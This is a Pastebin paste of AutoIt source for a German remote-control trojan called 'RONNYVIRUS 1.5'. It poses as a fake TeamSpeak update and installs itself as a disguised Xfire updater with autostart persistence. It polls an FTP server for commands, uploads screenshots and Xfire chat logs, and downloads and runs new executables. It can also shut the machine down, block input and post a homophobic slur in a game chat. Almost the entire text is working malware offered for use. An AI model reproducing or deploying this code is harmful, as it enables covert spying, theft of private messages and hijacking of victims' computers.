Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ;////////////////////////////////////////////
- ;RONNYVIRUS VERSION 1.5 by Daxter and nikeyY'
- ;///////////////////////////////////////////
- ;NEU IN 1.5: Xfire Chatlogstealer
- ;////////////////////////////////
- #include <ScreenCapture.au3>
- #include <Zip.au3>
- AutoItSetOption("TrayIconHide", 1)
- ;Auslesen des Xfire-Pfades
- $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xfire","")
- If @error Then
- $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Xfire","")
- EndIf
- ;Nachprüfen, ob als Updater gestartet wurde
- If NOT StringInStr($CmdLineRaw,"update",1) = 0 Then
- update()
- Exit
- EndIf
- ;Nachprüfen, ob schon infiziert wurde
- If @ScriptFullPath = $xfire&"\xfire_updater.exe" Then
- get()
- Exit
- EndIf
- ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
- ;Beginn des Fake-Updates für Teamspeak
- ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
- If ProcessExists("TeamSpeak.exe") Then
- MsgBox(16,"Fehler!","Teamspeak sollte während der Installation nicht laufen und wird nun geschlossen.")
- ProcessClose("TeamSpeak.exe")
- EndIf
- ;Auslesen des Teamspeak-Pfades
- $teamspeak = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\teamspeak\DefaultIcon","")
- if @error Then
- MsgBox (16, "TeamSpeak RC2 Update", "TeamSpeak2 wurde nicht erkannt. Stellen Sie sicher, dass TeamSpeak2 installiert ist!")
- infect()
- Exit
- endif
- $msg = MsgBox (36, "TeamSpeak RC2 Update", "Wollen Sie Das Update installieren? ")
- ;Fortschrittsanzeige der Fake-Installation
- if $msg = 6 Then
- ProgressOn("TeamSpeak RC2 Sicherheits-Update", "Update wird installiert . . .", "0 Prozent")
- For $i = 10 to 43 step 1
- sleep(50)
- ProgressSet( $i, $i & " Prozent")
- Next
- For $i = 44 to 80 step 1
- sleep(100)
- ProgressSet( $i, $i & " Prozent")
- Next
- For $i = 81 to 100 step 1
- sleep(30)
- ProgressSet( $i, $i & " Prozent")
- Next
- ProgressSet(100 , "Fertig!", "Update durchgeführt")
- sleep(500)
- ProgressOff()
- else
- infect()
- Exit
- endif
- $msg2 = MsgBox (324, "TeamSpeak RC2 Update", "Das Update wurde erfolgreich ausgeführt. Wollen Sie TeamSpeak2 nun starten?")
- if $msg2 = 6 Then
- Run($teamspeak)
- endif
- infect()
- ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
- ;Ende des Fake-Updates für Teamspeak
- ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
- ;;;;;;;;;;;;;;;;;;;;;;;;
- ;Infektion des Computers
- ;;;;;;;;;;;;;;;;;;;;;;;;
- Func infect()
- if DirGetSize("C:\Intel\Logs") = -1 Then
- DirCreate("C:\Intel\Logs")
- EndIf
- FileDelete("C:\Intel\log.ini")
- FileDelete("C:\Intel\AnalysisLog.txt")
- ;Erstellen und Überstragen einer .ini-Datei
- IniWrite("C:\Intel\log.ini","settings","sleep","5")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "ascii")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "put C:\Intel\log.ini /"&@computername&".ini")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "bye")
- ProcessClose("ftp.exe")
- ProcessWaitClose("ftp.exe")
- ShellExecute("ftp","-s:C:\Intel\AnalysisLog.txt ronnyvirus.bplaced.net","","open",@sw_hide)
- ProcessWaitClose("ftp.exe")
- FileDelete("C:\Intel\AnalysisLog.txt")
- FileDelete("C:\Intel\log.ini")
- ;Beenden voriger Versionen
- ProcessClose("xfire_updater.exe")
- ProcessWaitClose("xfire_updater.exe")
- ;Kopieren in den Xfire-Ordner
- FileCopy(@scriptfullpath,$xfire&"\xfire_updater.exe",9)
- ;Registry-Eintrag für Autostart setzen
- $var=RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","Xfire Update","REG_SZ",$xfire&"\xfire_updater.exe")
- If NOT $var = 1 Then
- FileCreateShortcut($xfire&"\xfire_updater.exe",@startupdir&"\Xfire Updater")
- EndIf
- ;Ausführen der kopierten Datei
- ShellExecute($xfire&"\xfire_updater.exe")
- Exit
- EndFunc
- ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
- ;Ende der Infektions-Funktion
- ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
- ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
- ;Befehlsabfrage- und ausführung
- ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
- Func get()
- ;Angabe der aktuellen Version
- $ver = "1.5"
- ;Auslesen des Betriebssystems
- if @OSVersion = "WIN_XP" Then
- $os = "xp"
- Else
- $os = "vista"
- EndIf
- ;Auslesen des Firefox-Pfades
- $version = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox","CurrentVersion")
- if @error then
- $version = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox","CurrentVersion")
- endif
- $firefox = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\"& $version &"\Main","PathToExe")
- if @error then
- $firefox = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\"& $version &"\Main","PathToExe")
- endif
- ;Auslesen des Xfire-Pfades
- $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xfire","")
- If @error Then
- $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Xfire","")
- EndIf
- if DirGetSize("C:\Intel\Logs") = -1 Then
- DirCreate("C:\Intel\Logs")
- EndIf
- ;Schließen des möglichen Updater-Prozesses
- ProcessClose("updater.exe")
- ProcessWaitClose("update.exe")
- ;Löschen des Updaters
- If FileExists("C:\Intel\update.exe") Then
- FileDelete("C:\Intel\update.exe")
- EndIf
- While 1
- ;Abfragen des Befehlablaufes vom Webspace
- $settings = 0
- FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "ascii")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "get /"&@computername&".ini C:\Intel\log.ini")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "bye")
- ProcessClose("ftp.exe")
- ProcessWaitClose("ftp.exe")
- ShellExecute("ftp","-s:C:\Intel\AnalysisLog.txt ronnyvirus.bplaced.net","","open",@SW_HIDE)
- ProcessWaitClose("ftp.exe")
- FileDelete("C:\Intel\AnalysisLog.txt")
- ;Speichern des Befehlsablaufes in einem zweidimensionalen Array
- $settings = IniReadSection("C:\Intel\log.ini","settings")
- FileDelete("C:\Intel\log.ini")
- ;Überprüfen, ob Abfragen gelungen ist
- If NOT IsArray($settings) Then
- get()
- Exit
- EndIf
- $x = 1
- ;Ausführung der Befehle
- While $x < ($settings[0][0] + 1)
- ;Sleep-Befehl
- If $settings[$x][0] = "sleep" Then
- Sleep((Number($settings[$x][1]))*1000)
- EndIf
- ;Link-Befehl
- If $settings[$x][0] = "link" Then
- AutoItSetOption("WinTitleMatchMode",2)
- Run($firefox&" -new-tab "&$settings[$x][1])
- ProcessWait("firefox.exe")
- WinActivate("Mozilla Firefox")
- WinWaitActive("Mozilla Firefox")
- EndIf
- ;Mediaplayer-Funktion
- If $settings[$x][0] = "media" Then
- ProcessClose("wmplayer.exe")
- ProcessWaitClose("wmplayer.exe")
- ShellExecute("wmplayer",'/Filename "'&$settings[$x][1]&'"',"","open",@SW_Hide)
- EndIf
- ;MsgBox-Funktion
- If $settings[$x][0] = "msg" Then
- MsgBox(64,"",$settings[$x][1])
- EndIf
- ;CD-Laufwerks-Funktion
- If $settings[$x][0] = "cd" Then
- CDTray("E:", $settings[$x][1])
- CDTray("F:", $settings[$x][1])
- CDTray("G:", $settings[$x][1])
- CDTray("H:", $settings[$x][1])
- EndIf
- ;Xfire-Chatlog-Hochlade-Funktion
- If $settings[$x][0] = "chatlog" and $settings[$x][1] = "xfire" Then
- FileDelete("C:\Intel\Logs\log.zip")
- _Zip_Create("C:\Intel\Logs\log.zip")
- _Zip_AddFolderContents("C:\Intel\Logs\log.zip", @AppDataDir & "\Xfire\chatlog")
- sleep(3000)
- FileWriteLine("C:\Intel\Logs\Log.txt", "ronnyvirus")
- FileWriteLine("C:\Intel\Logs\Log.txt", "ronnyvirus")
- FileWriteLine("C:\Intel\Logs\Log.txt", "binary")
- FileWriteLine("C:\Intel\Logs\Log.txt", "put C:\Intel\Logs\log.zip /chatlogs/"&@ComputerName&"_xfire.zip")
- FileWriteLine("C:\Intel\Logs\Log.txt", "bye")
- ProcessClose("ftp.exe")
- ProcessWaitClose("ftp.exe")
- ShellExecute("ftp","-s:C:\Intel\Logs\Log.txt ronnyvirus.bplaced.net","","open",@SW_HIDE)
- ProcessWaitClose("ftp.exe")
- FileDelete("C:\Intel\Logs\Log.txt")
- FileDelete("C:\Intel\Logs\log.zip")
- EndIf
- ;Prozessschließungs-Funktion
- If $settings[$x][0] = "close" Then
- ProcessClose($settings[$x][1])
- EndIf
- ;Funktion zum Beenden des Abfragens
- If $settings[$x][0] = "exit" Then
- Exit
- EndIf
- ;Screenshot-Funktion
- If $settings[$x][0] = "screen" Then
- _ScreenCapture_SetJPGQuality(Number($settings[$x][1]))
- _ScreenCapture_Capture("C:\Intel\Logs\log.jpg")
- FileWriteLine("C:\Intel\Logs\Log.txt", "ronnyvirus")
- FileWriteLine("C:\Intel\Logs\Log.txt", "ronnyvirus")
- FileWriteLine("C:\Intel\Logs\Log.txt", "binary")
- FileWriteLine("C:\Intel\Logs\Log.txt", "put C:\Intel\Logs\log.jpg /screenshots/"&@ComputerName&"/"&@MDAY&"."&@MON&"-"&@HOUR&"."&@MIN&"."&@SEC&".jpg")
- FileWriteLine("C:\Intel\Logs\Log.txt", "bye")
- ProcessClose("ftp.exe")
- ProcessWaitClose("ftp.exe")
- ShellExecute("ftp","-s:C:\Intel\Logs\Log.txt ronnyvirus.bplaced.net","","open",@SW_HIDE)
- ProcessWaitClose("ftp.exe")
- FileDelete("C:\Intel\Logs\Log.txt")
- FileDelete("C:\Intel\Logs\log.jpg")
- EndIf
- ;Shutdown-Funktion
- If $settings[$x][0] = "shutdown" Then
- Shutdown($settings[$x][1])
- EndIf
- ;Selfkill-Funktion(CoD2)
- If $settings[$x][0] = "selfkill" Then
- BlockInput(1)
- Send("{a up}")
- Send("{w up}")
- Send("{s up}")
- Send("{d up}")
- MouseMove(mousegetpos(0)+50, mousegetpos(1)+2000, 1)
- sleep (50)
- Send("^/+frag/-frag")
- sleep (50)
- MouseMove(mousegetpos(0)+50, mousegetpos(1)+1000, 80)
- Sleep(200)
- Send("tI AM GAY!"& @CRLF)
- sleep(1000)
- BlockInput(0)
- EndIf
- ;Scroll-Funktion
- If $settings[$x][0] = "scroll" Then
- BlockInput(1)
- $y = ($settings[$x][1]*10)
- While $y>0
- MouseWheel("down", 1)
- Sleep(100)
- $y = $y - 1
- WEnd
- BlockInput(0)
- EndIf
- ;Pause-Funktion
- If $settings[$x][0] = "pause" Then
- IniWrite("C:\Intel\log.ini","settings","sleep","5")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "ascii")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "put C:\Intel\log.ini /"&@computername&".ini")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "bye")
- ShellExecute("ftp","-s:C:\Intel\AnalysisLog.txt ronnyvirus.bplaced.net","","open",@sw_hide)
- ProcessWaitClose("ftp.exe")
- FileDelete("C:\Intel\AnalysisLog.txt")
- FileDelete("C:\Intel\log.ini")
- EndIf
- ;Update-Funktion (Laden und Ausführen der neuen .exe vom Webspace)
- If $settings[$x][0] = "update" AND $settings[$x][1] <> $ver Then
- FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "binary")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "get /update/update.exe C:\Intel\update.exe")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "bye")
- ProcessClose("ftp.exe")
- ProcessWaitClose("ftp.exe")
- ShellExecute("ftp","-s:C:\Intel\AnalysisLog.txt ronnyvirus.bplaced.net","","open",@SW_HIDE)
- ProcessWaitClose("ftp.exe")
- FileDelete("C:\Intel\AnalysisLog.txt")
- FileDelete("C:\Intel\log.ini")
- If FileExists("C:\Intel\update.exe") Then
- ShellExecute("C:\Intel\update.exe","update")
- ProcessWait("update.exe")
- EndIf
- Exit
- EndIf
- $x = $x + 1
- WEnd
- ;Ende der Befehlsausführung, erneute Ablaufabfrage
- WEnd
- EndFunc
- ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
- ;Ende der Abfrage- und Ausführungsfunktion
- ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
- ;;;;;;;;;;;;;;;;
- ;Update-Funktion
- ;;;;;;;;;;;;;;;;
- Func update()
- ;Auslesen des Xfire-Pfades
- $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xfire","")
- If @error Then
- $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Xfire","")
- EndIf
- ;Schließen des alten Prozesses
- ProcessClose("xfire_updater.exe")
- ProcessWaitClose("xfire_updater.exe")
- ;Löschen der alten .exe
- If FileExists($xfire&"\xfire_updater.exe") Then
- FileDelete($xfire&"\xfire_updater.exe")
- If FileExists($xfire&"\xfire_updater.exe") Then
- update()
- Exit
- EndIf
- EndIf
- ;Infizieren mit neuer .exe
- FileCopy(@scriptfullpath,$xfire&"\xfire_updater.exe",9)
- ;;Registry-Eintrag für Autostart setzen
- $var=RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","Xfire Update","REG_SZ",$xfire&"\xfire_updater.exe")
- If NOT $var = 1 Then
- FileCreateShortcut($xfire&"\xfire_updater.exe",@startupdir&"\Xfire Updater")
- EndIf
- ;Starten der neuen .exe
- ShellExecute($xfire&"\xfire_updater.exe")
- Exit
- EndFunc
- ;;;;;;;;;;;;;;;;;;;;;;;;;
- ;Ende der Update-Funktion
- ;;;;;;;;;;;;;;;;;;;;;;;;;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement